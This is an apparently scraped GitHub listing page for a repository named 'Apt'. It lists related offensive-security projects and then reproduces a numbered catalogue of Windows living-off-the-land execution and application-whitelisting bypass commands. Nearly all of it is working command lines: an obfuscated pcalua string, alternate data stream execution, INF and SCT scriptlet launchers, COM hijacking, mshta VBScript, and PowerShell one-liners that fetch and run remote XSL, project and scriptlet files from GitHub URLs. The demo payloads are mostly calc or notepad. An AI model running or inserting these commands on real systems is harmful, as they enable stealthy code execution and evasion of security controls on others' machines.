homjxi0e / Apt
APT || Execution || Launch || APTs || ( Authors harr0ey, bohops )
Stars: ✭ 83
Projects that are alternatives of or similar to Apt
LOLBAS222
APT || Execution || Launch || APTs || ( Authors harr0ey, bohops )
Stars: ✭ 100 (+20.48%)
Mutual labels: attack, apt, malware
mitre-visualizer
🧬 Mitre Interactive Network Graph (APTs, Malware, Tools, Techniques & Tactics)
Stars: ✭ 49 (-40.96%)
Mutual labels: attack, malware
Wifiphisher
Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malwares.
Stars: ✭ 10,333 (+12349.4%)
Mutual labels: malware, attack
ThePhish
ThePhish: an automated phishing email analysis tool
Stars: ✭ 676 (+714.46%)
Mutual labels: attack, malware
Windows-APT-Warfare
著作《Windows APT Warfare:惡意程式前線戰術指南》各章節技術實作之原始碼內容
Stars: ✭ 241 (+190.36%)
Mutual labels: apt, malware
Awesome Cybersecurity Datasets
A curated list of amazingly awesome Cybersecurity datasets
Stars: ✭ 380 (+357.83%)
Mutual labels: malware, attack
Google rat
A Remote Access Tool using Google Apps Script as the proxy for command and control.
Stars: ✭ 64 (-22.89%)
Mutual labels: malware
Ursadb
Trigram database written in C++, suited for malware indexing
Stars: ✭ 72 (-13.25%)
Mutual labels: malware
Malwareclassifier
Malware Classifier From Network Captures
Stars: ✭ 75 (-9.64%)
Mutual labels: malware
Malware Feed
Bringing you the best of the worst files on the Internet.
Stars: ✭ 69 (-16.87%)
Mutual labels: malware
Robust Adv Malware Detection
Code repository for the paper "Adversarial Deep Learning for Robust Detection of Binary Encoded Malware"
Stars: ✭ 63 (-24.1%)
Mutual labels: malware
Malwaredatascience
Malware Data Science Reading Diary / Notes
Stars: ✭ 82 (-1.2%)
Mutual labels: malware
Malware Analysis Scripts
Collection of scripts for different malware analysis tasks
Stars: ✭ 61 (-26.51%)
Mutual labels: malware
Evilclippy
A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.
Stars: ✭ 1,224 (+1374.7%)
Mutual labels: malware
####################### | # | APT # | # #######################
( 1 ) Use Pcalua
p^c^a^l^u^a^ ^-^n^ ^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a calc.exe
( 2 ) Alternate Data Streams ADS:>
cmd.exe:> type C:\Users\Gihad\Desktop\file.bat > C:\Users\Gihad\Desktop\test.txt:x22x2
cmd.exe:> netsh exec C:\Users\Gihad\Desktop\test.txt:x22x2
( 3 ) pnputil.exe Launcher .INF:> Note This Eveything here .INF Work on My Script INFscript Only !
pnputil.exe /add-driver C:\FilesINFExecution.inf /install
&- My Code INFScript Injection Command Line
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf
( 4 ) INFDefaultInstall Launch Execute INFScript
INFDefaultInstall.exe C:\INFPS.inf
&- Code INFScript
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf
( 5 ) setupapi.dll Launch Execute My INFScript
setupapi.dll,InstallHinfSection DefaultInstall 132 C:\INFPS.inf
&- Code INFScript
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf
( 6 ) DLL Execution Using ( Reflection ) In CPLEx AccessibilityCPL RegServer
&- Add Values in HKLM Name File ms-settings in Open/Shell/Command
&- rundll32 accessibilitycpl.dll,DllRegisterServer
&- rundll32 shell32.dll,Control_RunDLL "C:\Windows\tem32\desk.cpl"
( 7 ) Language LUA in Files .wlua
wlua.exe C:\testing.wlua
&- Hello World Exe My Code LUA
https://gist.githubusercontent.com/homjxi0e/bbd218dea9bf63fd36524b9777a399f3/raw/888f7e484651fdb733d6261ca002d684a6e5bf9b/Test.wlua
( 8 ) SCT ScriptLet Execution in My INFScript
rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf
&- Raw Code
https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
( 9 ) Jscript Execute Code Via ( Eval,VSA,)
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript')
$attack = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")'
[Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
&- Code Execute
https://gist.githubusercontent.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec/raw/4c8709382280de158b99dd78f91875e32a54bac4/ATPSJScript
( 10 ) MSI Launch Execution ( MsiExec.exe )
msiexec.exe /passive /i C:\testing.msi /norestart
&- File MSI Hello World Exe in .MSI
( 10v1 ) COM Component object Model Hijacking
&- Add Reg in System
https://gist.githubusercontent.com/homjxi0e/8e42aa716361dc41b1c45a314bea501c/raw/327104671eebad1361210524f34076503e6b8e44/COM-hijacking.reg
&- You can now Execution invoke-CLSID Via xwizard.exe
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
( 10v2 ) Execute VBScript Via mshta.exe
&- Execute VBScript Code using mshta.exe
mshta.exe VBScript:Close(Execute("Set S=CreateObject(""WScript.Shell""):If S.AppActivate(""maybe-Run"")=False Then:S.Run(""C:\Windows\system32\Calc.exe""):End If"))
https://gist.githubusercontent.com/homjxi0e/eb16d75f3db6d6081648f2c5c5c98c3b/raw/0870f7553095dcf6519f93c1cf72c6415468140b/VBSExC
( 10v3 ) forfiles.exe Execution Endless
forfiles.exe /c calc.exe
( 10v4 ) Powershell Scriptlet COM Object Hijacking via System.Activator
$COMobj = [activator]::CreateInstance([type]::GetTypeFromCLSID("{00020000-0000-0000-C000-000000000046}"));$COMobj.Exec();
https://gist.github.com/homjxi0e/40f30c3be62c6ef152d6f6fffa9dba3c
( 10v5 ) ScriptRunner.exe Execution
ScriptRunner.exe -appvscript C:\Windows\System32\calc.exe
( 10v6 ) msdt.exe Execute EXE-MSI Via Reader XML wtih Launch by Pcwrun.exe
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
&- link file PCW8E57.xml
https://gist.github.com/homjxi0e/3f35212db81b9375b7906031a40c6d87
( 10v7 ) Launch MSI Pacakge Execution Powershell
install-Package C:\test.msi
https://github.com/homjxi0e/MSIScript/blob/master/Exec-Execute.msi
( 10v8 ) DLL Execute CML Launch Application
rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe
( 10v9 ) HTA/MSI Execute Using OpenWith.exe
Whitelisting SRP Bypassing Using OpenWith.exe To Launch HTA/MSI Execution
&- OpenWith.exe /c C:\test.hta
&- OpenWith.exe /c C:\testing.msi
( 10v11 ) XrML Digital License (.xrm-ms) ActiveX
iexplorer C:\test.xrm-ms
https://gist.github.com/homjxi0e/099d8f35f3b2e1b7daa7cbe366df1ed3
( 10v12 )
start C:\obj.url
https://gist.github.com/homjxi0e/0023a9cb5d4fee198019f87bd348effc
( 10 v13 ) ActiveX executing using a SVG Document
iexplorer C:\PoC.svg
https://gist.github.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0
(10v14) Dxcap.exe Abuse
Dxcap.exe -c C:\Windows\System32\notepad.exe
(Note) Product Via @bohops ( 11 ) HTA Launch Execution ( url.dll )
Rundll32.exe url.dll,OpenURL FileHTA Or Anything
( 12 ) SCT Launch Execution InSide INFScript ( ieadvpack.dll )
rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
( 13 ) XML Launch Execution Via Reflection,Assembly Powershell
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.build();
( 14 ) CSharp Launch Execution Via Reflection.Assembly Powershell
[Reflection.Assembly]::LoadWithPartialName('http://Microsoft.Build '); $e=new-object http://Microsoft.Build.Evaluation.Project('evil.csproj'); $e.Build();
( 15 ) SCT Execution Via INFScript By ( advpack.dll )
rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
( 16 ) XML Launch Execution Via Reader XML,Transform Object Powershell
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
( 17 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.VisualBasic )
[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …').Exec(0)
( 18 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.JScript )
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
( 19 ) Commandline APT Launch Execution Applocker/Bypassing Via ( CL_LoadAssembly )
import-module C:\windows\diagnostics\system\AERO\CL_LoadAssembly.ps1
LoadAssemblyFromPath C:\Windows\System32\calc.exe
( 20 ) HTA Launch Execution Via ( shdocvw.dll )
rundll32.exe shdocvw.dll, OpenURL <path to local URL file>
( 21 ) HTA Launch Execution Via ( ieframe.dll )
rundll32.exe ieframe.dll, OpenURL <path to local URL file>
( 22 ) Commandline Execute Via Vshadow.exe
Vshadow exec calc.exe
( 23 ) CSharp Execution Via ProjectInstance RA Powershell
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build')
$p="c:\test\test.csproj"
$e=new-object Microsoft.Build.Execution.ProjectInstance($p)
$e.build()
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].